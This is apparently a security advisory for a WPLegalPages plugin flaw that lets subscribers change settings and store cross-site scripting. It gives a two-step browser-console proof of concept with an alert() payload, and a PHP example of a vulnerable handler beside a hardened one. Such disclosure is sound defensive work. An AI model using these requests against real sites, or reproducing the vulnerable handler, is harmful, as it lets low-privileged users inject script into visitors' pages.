wpexploit
Krzysztof Zając
WPEX-ID: 47DF802D-5200-484B-959C-9F569EDF992E
Jan 05, 2022 - 12:00 a.m.

WPLegalPages < 2.7.1 - Subscriber+ Arbitrary Settings Update to Stored XSS


EPSS: 0.001
Percentile: 21.1%

The plugin does not check for authorisation and has flawed CSRF logic when saving its settings, allowing any authenticated user, such as a subscriber, to update them. Furthermore, due to the lack of sanitisation and escaping, this can lead to Stored Cross-Site Scripting.

Run the commands below in the web developer console of the web browser while authenticated as any user (for example, a subscriber):

// Step 1: enable the cookie bar through the settings handler, which performs no capability or nonce check.
fetch("https://example.com/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "body": new URLSearchParams({"action":"lp_save_admin_settings", "lp-cookie-bar": "ON"}),
  "method": "POST",
  "credentials": "include"
});

// Step 2: store the unsanitised button text, which is later echoed unescaped into the frontend pages.
fetch("https://example.com/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "body": new URLSearchParams({"action":"save_cookie_bar_form", "lp-cookie-button-text": "I agree');alert(/XSS/);//"}),
  "method": "POST",
  "credentials": "include"
});

The XSS will be triggered on all frontend pages.
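As an added illustration (not WPLegalPages' own code and not the author's patch), the handler shape that closes the three gaps the description names for a WordPress admin-ajax endpoint: a nonce check, a capability check, and sanitisation on save plus context-aware escaping on output. The action name save_cookie_bar_form and the field lp-cookie-button-text are taken from the PoC above; the option key, nonce action, function names and the wp_footer output hook are assumptions.

```php
<?php
// Added example, not WPLegalPages' code. Option key, nonce action and
// the wp_footer output hook are assumptions for illustration.

// Vulnerable shape (illustrative of the described flaw, not the plugin's
// actual source): reachable by any logged-in user, stores the raw value.
function lp_example_save_cookie_bar_vulnerable() {
    update_option( 'lp_example_cookie_button_text', $_POST['lp-cookie-button-text'] );
    wp_send_json_success();
}

// Hardened shape: CSRF token bound to one action, a capability check,
// and sanitisation before the value is stored.
function lp_example_save_cookie_bar_hardened() {
    // Dies with HTTP 403 when the 'nonce' field is missing or stale, so a
    // cross-site POST cannot drive this endpoint.
    check_ajax_referer( 'lp_example_save_cookie_bar', 'nonce' );

    // A subscriber session is authenticated but not authorised.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'insufficient privileges', 403 );
    }

    $text = isset( $_POST['lp-cookie-button-text'] )
        ? sanitize_text_field( wp_unslash( $_POST['lp-cookie-button-text'] ) )
        : '';
    update_option( 'lp_example_cookie_button_text', $text );
    wp_send_json_success();
}
add_action( 'wp_ajax_save_cookie_bar_form', 'lp_example_save_cookie_bar_hardened' );
// No wp_ajax_nopriv_ hook on purpose: unauthenticated users never reach it.

// Output: escape for the context the value lands in. The PoC payload
// ("I agree');alert(/XSS/);//") closes a JS string literal, so a value
// echoed into inline script needs esc_js() (single-quoted string) and one
// echoed into HTML needs esc_html(); sanitising on save alone covers neither.
function lp_example_render_cookie_bar() {
    $text = get_option( 'lp_example_cookie_button_text', 'I agree' );
    echo '<button id="lp-example-accept">' . esc_html( $text ) . '</button>';
    echo "<script>var lpExampleLabel = '" . esc_js( $text ) . "';</script>";
}
add_action( 'wp_footer', 'lp_example_render_cookie_bar' );
```

The nonce field must be generated server-side with wp_create_nonce( 'lp_example_save_cookie_bar' ) and included in the request; without it the hardened handler rejects every call, which is exactly what blocks the PoC's second request from an unprivileged session.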

